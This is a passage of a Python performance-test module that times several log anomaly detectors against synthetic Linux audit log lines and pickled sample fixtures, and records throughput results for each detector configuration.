% reset_factor) def run_allowlist_violation_detector(self, number_of_paths, modulo_factor): """Run the performance tests for AllowlistViolationDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 rules = [] while i < number_of_paths: rules.append(PathExistsMatchRule(self.integerd + str(i % number_of_paths), None)) i = i + 1 allowlist_violation_detector = AllowlistViolationDetector(self.aminer_config, rules, [self.stream_printer_event_handler]) t = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: r = random.randint(1, 100) if r >= modulo_factor: r = 2 else: r = 1 decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % (number_of_paths * r)), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i % 100).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, allowlist_violation_detector) measured_time += timeit.timeit(lambda: allowlist_violation_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( allowlist_violation_detector.__class__.__name__, avg, results, '%d different PathExistsMatchRules and a moduloFactor of %d.' 
% (number_of_paths, modulo_factor)) def run_new_match_id_value_combo_detector(self, min_allowed_time_diff): """Run the performance tests for NewMatchIdValueComboDetector.""" log_lines = [ b'type=SYSCALL msg=audit(1580367384.000:1): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00' b' nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 
a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367398.000:7): arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 
fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 ' b'a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 ' b'tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)'] parsing_model = FirstMatchModelElement('type', [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), 
FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])]) results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_id_value_combo_detector = NewMatchIdValueComboDetector(self.aminer_config, [ 'parser/type/path/name', 'parser/type/syscall/syscall'], [self.stream_printer_event_handler], id_path_list=['parser/type/path/id', 'parser/type/syscall/id'], min_allowed_time_diff=min_allowed_time_diff, learn_mode=False, allow_missing_values_flag=True, persistence_id='audit_type_path', output_logline=False) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: r = random.randint(0, len(log_lines)-1) line = log_lines[r] log_atom = LogAtom( line, ParserMatch(parsing_model.get_match_element('parser', MatchContext(line))), t + i, self.__class__.__name__) measured_time += timeit.timeit(lambda: new_match_id_value_combo_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = 
avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( new_match_id_value_combo_detector.__class__.__name__, avg, results, '%.2f seconds min_allowed_time_diff.' % min_allowed_time_diff) def run_parser_count(self, set_path_list, report_after_number_of_elements): """Run the performance tests for ParserCount.""" log_lines = [ b'type=SYSCALL msg=audit(1580367384.000:1): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00' b' nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 
fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367394.000:6): arch=c000003e syscall=4 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367395.000:7): item=0 name="five" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367396.000:8): arch=c000003e syscall=6 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367397.000:6): item=0 name="four" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367398.000:7): 
arch=c000003e syscall=5 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367399.000:8): item=0 name="six" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367400.000:9): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f ' b'items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ' b'ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367401.000:9): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=PATH msg=audit(1580367402.000:10): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 ' b'rdev=00:00 nametype=NORMAL', b'type=SYSCALL msg=audit(1580367403.000:10): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 ' b'a3=4f items=1 ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 ' b'tty=(none) ses=4294967295 comm="apache2" exe="/usr/sbin/apache2" key=(null)'] parsing_model = FirstMatchModelElement('type', [SequenceModelElement('path', [ FixedDataModelElement('type', b'type=PATH '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('item_string', b'): item='), DecimalIntegerValueModelElement('item'), FixedDataModelElement('name_string', b' name="'), DelimitedDataModelElement('name', b'"'), FixedDataModelElement('inode_string', b'" inode='), DecimalIntegerValueModelElement('inode'), FixedDataModelElement('dev_string', b' dev='), 
DelimitedDataModelElement('dev', b' '), FixedDataModelElement('mode_string', b' mode='), DecimalIntegerValueModelElement('mode', value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement('ouid_string', b' ouid='), DecimalIntegerValueModelElement('ouid'), FixedDataModelElement('ogid_string', b' ogid='), DecimalIntegerValueModelElement('ogid'), FixedDataModelElement('rdev_string', b' rdev='), DelimitedDataModelElement('rdev', b' '), FixedDataModelElement('nametype_string', b' nametype='), FixedWordlistDataModelElement('nametype', [b'NORMAL', b'ERROR'])]), SequenceModelElement('syscall', [ FixedDataModelElement('type', b'type=SYSCALL '), FixedDataModelElement('msg_audit', b'msg=audit('), DelimitedDataModelElement('msg', b':'), FixedDataModelElement('placeholder', b':'), DecimalIntegerValueModelElement('id'), FixedDataModelElement('arch_string', b'): arch='), DelimitedDataModelElement('arch', b' '), FixedDataModelElement('syscall_string', b' syscall='), DecimalIntegerValueModelElement('syscall'), FixedDataModelElement('success_string', b' success='), FixedWordlistDataModelElement('success', [b'yes', b'no']), FixedDataModelElement('exit_string', b' exit='), DecimalIntegerValueModelElement('exit'), AnyByteDataModelElement('remainding_data')])]) results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: if set_path_list: parser_count = ParserCount(self.aminer_config, ['parser/type/path/name', 'parser/type/syscall/syscall'], [ self.stream_printer_event_handler], report_after_number_of_elements) else: parser_count = ParserCount(self.aminer_config, None, [self.stream_printer_event_handler], report_after_number_of_elements) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: r = random.randint(0, len(log_lines) - 1) line = log_lines[r] log_atom = LogAtom(line, ParserMatch(parsing_model.get_match_element('parser', MatchContext(line))), t + i, self.__class__.__name__) measured_time += 
timeit.timeit(lambda: parser_count.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( parser_count.__class__.__name__, avg, results, 'set_path_list: %s, report_after_number_of_elements: %d' % (set_path_list, report_after_number_of_elements)) def run_event_correlation_detector(self, generation, diff, p0, alpha, max_hypotheses, max_observations, candidates_size, hypothesis_eval_delta_time, delta_time_to_discard_hypothesis): """Run the performance tests for EventCorrelationDetector.""" alphabet = b'abcdefghijklmnopqrstuvwxyz' children = [] for i, char in enumerate(alphabet): char = bytes([char]) children.append(FixedDataModelElement(char.decode(), char)) alphabet_model = FirstMatchModelElement('first', children) # training phase results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], generation_factor=generation, generation_probability=generation, max_hypotheses=max_hypotheses, max_observations=max_observations, p0=p0, alpha=alpha, candidates_size=candidates_size, hypotheses_eval_delta_time=hypothesis_eval_delta_time, delta_time_to_discard_hypothesis=delta_time_to_discard_hypothesis) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: char = bytes([alphabet[i % len(alphabet)]]) parser_match = ParserMatch(alphabet_model.get_match_element('parser', MatchContext(char))) t += diff measured_time += timeit.timeit(lambda: ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__)), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( ecd.__class__.__name__, avg, results, 'learn_mode: %s, generation: %.2f, diff: %.2f, p0: %.2f, alpha: %.2f, max_hypothesis: %d, max_observations: %d, candid' 
'ates_size %d, hypothesis_eval_delta_time: %.2f, delta_time_to_discard_hypothesis: %.2f' % ( ecd.learn_mode, generation, diff, p0, alpha, max_hypotheses, max_observations, candidates_size, hypothesis_eval_delta_time, delta_time_to_discard_hypothesis)) # check_phase results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: ecd.learn_mode = False t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: char = bytes([alphabet[i % len(alphabet)]]) parser_match = ParserMatch(alphabet_model.get_match_element('parser', MatchContext(char))) t += diff measured_time += timeit.timeit(lambda: ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__)), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( ecd.__class__.__name__, avg, results, 'learn_mode: %s, generation: %.2f, diff: %.2f, p0: %.2f, alpha: %.2f, max_hypothesis: %d, max_observations: %d, candid' 'ates_size %d, hypothesis_eval_delta_time: %.2f, delta_time_to_discard_hypothesis: %.2f' % ( ecd.learn_mode, generation, diff, p0, alpha, max_hypotheses, max_observations, candidates_size, hypothesis_eval_delta_time, delta_time_to_discard_hypothesis)) def run_match_filter(self, number_of_paths): """Run the performance tests for MatchFilter.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) match_filter = MatchFilter(self.aminer_config, ['d' + str(i) for i in range(number_of_paths)], [ self.stream_printer_event_handler]) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) p = process_time() r 
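= random.randint(1, 1000000)
                seconds = seconds + process_time() - p
                match_context = MatchContext(str(i).encode())
                match_element = decimal_integer_value_me.get_match_element('integer', match_context)
                log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, match_filter)
                measured_time += timeit.timeit(lambda: match_filter.receive_atom(log_atom), number=1)
                i = i + 1
            # only waiting_time / 10 seconds are timed, so the atom count is scaled by 10
            results[z] = i * 10
            z = z + 1
            avg = avg + i * 10
        avg = avg / self.iterations
        type(self).result = self.result + self.result_string % (
            match_filter.__class__.__name__, avg, results,
            'a %s and %d different path(es).' % (new_match_path_detector.__class__.__name__, number_of_paths))

    # Sentinel meaning "no path restriction" for the ETD/VTD/VCD runs; reported as 'all' in the result string.
    ALL_PATHS_SENTINEL = 1000000

    def _load_vtd_data(self):  # skipcq: PYL-R0201
        """
        Load the pickled sample lists used by the EventTypeDetector, VariableTypeDetector and VariableCorrelationDetector runs.

        The files are test fixtures shipped with the repository under unit/data/vtd_data. pickle.load() executes arbitrary code
        from the file it reads, which is the only reason the BAN-B301 finding is suppressed here: this helper must never be
        pointed at files that do not come from the repository itself.
        @return the concatenation (via +) of every loaded sample list, in the fixed order the original runs used.
        """
        data = None
        # the *_test6 fixtures hold one sample list each
        for name in ('uni_data_test6', 'nor_data_test6', 'beta1_data_test6'):
            with open('unit/data/vtd_data/' + name, 'rb') as f:
                samples = pickle.load(f)  # skipcq: BAN-B301
            data = samples if data is None else data + samples
        # the *_test7 fixtures hold [initial, update, _, _]; only the first two lists are used
        for name in ('uni_data_test7', 'nor_data_test7', 'beta1_data_test7', 'beta2_data_test7', 'beta3_data_test7',
                     'beta4_data_test7', 'beta5_data_test7'):
            with open('unit/data/vtd_data/' + name, 'rb') as f:
                [initial, update, _, _] = pickle.load(f)  # skipcq: BAN-B301
            data = data + initial + update
        return data

    def _run_detector_on_vtd_data(self, number_of_paths, create_detector, feed_event_type_detector):
        """
        Shared measurement loop for the EventTypeDetector, VariableTypeDetector and VariableCorrelationDetector runs.

        @param number_of_paths number of distinct paths /integer/d0../integer/d<n-1> to cycle through; None or
               ALL_PATHS_SENTINEL means the detectors get no target_path_list.
        @param create_detector callable(event_type_detector, path_list) returning the detector whose receive_atom() is timed.
        @param feed_event_type_detector when True every atom is first handed to the EventTypeDetector (asserted to be accepted)
               before the timed detector sees it, as the VTD and VCD work on the ETD's state.
        """
        data = self._load_vtd_data()
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            path_list = None
            if number_of_paths is not None and number_of_paths != self.ALL_PATHS_SENTINEL:
                path_list = ['/integer/d' + str(i) for i in range(number_of_paths)]
            else:
                number_of_paths = self.ALL_PATHS_SENTINEL
            event_type_detector = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=path_list)
            detector = create_detector(event_type_detector, path_list)
            seconds = time.time()
            i = 0
            measured_time = 0
            while measured_time < self.waiting_time / 10:
                any_byte_data_me = AnyByteDataModelElement('d' + str(i % number_of_paths))
                # the CPU time spent drawing the random timestamp offset is added back so it is not charged to the detector
                p = process_time()
                r = random.randint(1, 1000000)
                seconds = seconds + process_time() - p
                match_context = MatchContext(str(data[i % len(data)]).encode())
                match_element = any_byte_data_me.get_match_element('/integer', match_context)
                log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, event_type_detector)
                if feed_event_type_detector:
                    self.assertTrue(event_type_detector.receive_atom(log_atom))
                measured_time += timeit.timeit(lambda: detector.receive_atom(log_atom), number=1)
                i = i + 1
            # only waiting_time / 10 seconds are timed, so the atom count is scaled by 10
            results[z] = i * 10
            z = z + 1
            avg = avg + i * 10
        avg = avg / self.iterations
        if number_of_paths == self.ALL_PATHS_SENTINEL:
            number_of_paths = 'all'
        type(self).result = self.result + self.result_string % (
            detector.__class__.__name__, avg, results, '%s different path(es).' % (str(number_of_paths)))

    def run_event_type_detector(self, number_of_paths):
        """Run the performance tests for EventTypeDetector."""
        # the timed detector is the EventTypeDetector itself
        self._run_detector_on_vtd_data(number_of_paths, lambda event_type_detector, path_list: event_type_detector, False)

    def run_variable_type_detector(self, number_of_paths):
        """Run the performance tests for VariableTypeDetector."""
        self._run_detector_on_vtd_data(
            number_of_paths,
            lambda event_type_detector, path_list: VariableTypeDetector(
                self.aminer_config, [self.stream_printer_event_handler], event_type_detector, target_path_list=path_list),
            True)

    def run_variable_correlation_detector(self, number_of_paths):
        """Run the performance tests for VariableCorrelationDetector."""
        self._run_detector_on_vtd_data(
            number_of_paths,
            lambda event_type_detector, path_list: VariableCorrelationDetector(
                self.aminer_config, [self.stream_printer_event_handler], event_type_detector),
            True)

    def _run_detector_on_integer_paths(self, number_of_paths, create_detector):
        """
        Shared measurement loop for the EventFrequencyDetector and EventSequenceDetector runs.

        @param number_of_paths number of distinct paths d0..d<n-1> to cycle through; None generates a new path per atom and
               passes no path list to the detector.
        @param create_detector callable(path_list) returning the detector whose receive_atom() is timed.
        """
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            # only the class name of this detector ends up in the result string
            new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True)
            path_list = None
            if number_of_paths is not None:
                path_list = ['d' + str(i) for i in range(number_of_paths)]
            detector = create_detector(path_list)
            seconds = time.time()
            i = 0
            measured_time = 0
            while measured_time < self.waiting_time / 10:
                if number_of_paths is None:
                    path = 'd' + str(i)
                else:
                    path = 'd' + str(i % number_of_paths)
                decimal_integer_value_me = DecimalIntegerValueModelElement(
                    path, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
                # the CPU time spent drawing the random timestamp offset is added back so it is not charged to the detector
                p = process_time()
                r = random.randint(1, 1000000)
                seconds = seconds + process_time() - p
                match_context = MatchContext(str(i).encode())
                match_element = decimal_integer_value_me.get_match_element('integer', match_context)
                log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, detector)
                measured_time += timeit.timeit(lambda: detector.receive_atom(log_atom), number=1)
                i = i + 1
            # only waiting_time / 10 seconds are timed, so the atom count is scaled by 10
            results[z] = i * 10
            z = z + 1
            avg = avg + i * 10
        avg = avg / self.iterations
        type(self).result = self.result + self.result_string % (
            detector.__class__.__name__, avg, results,
            'a %s and %s different path(es).' % (new_match_path_detector.__class__.__name__, str(number_of_paths)))

    def run_event_frequency_detector(self, number_of_paths):
        """Run the performance tests for EventFrequencyDetector."""
        self._run_detector_on_integer_paths(
            number_of_paths,
            lambda path_list: EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=path_list))

    def run_event_sequence_detector(self, number_of_paths):
        """Run the performance tests for EventSequenceDetector."""
        self._run_detector_on_integer_paths(
            number_of_paths,
            lambda path_list: EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=path_list))

    def test01atom_filters(self):
        """Start performance tests for AtomFilters."""
        for number_of_paths in (1, 30, 100):
            self.run_atom_filters_match_path_filter(number_of_paths)
        for number_of_paths in (1, 30, 100):
            self.run_atom_filters_match_value_filter(number_of_paths)

    def test02enhanced_new_match_path_value_combo_detector(self):
        """Start performance tests for EnhancedNewMatchPathValueComboDetector."""
        for number_of_paths in (1, 30, 100):
            self.run_enhanced_new_match_path_value_combo_detector(number_of_paths)

    def test03histogram_analysis(self):
        """Start performance tests for HistogramAnalysis."""
        # the second argument is the outer sweep, as in the original call list
        for second_arg in (100, 1000, 10000):
            for first_arg in (1, 30, 100, 10000):
                self.run_histogram_analysis(first_arg, second_arg)

    def test04match_value_average_change_detector(self):
        """Start performance tests for MatchValueAverageChangeDetector."""
        for number_of_paths in (1, 30, 100):
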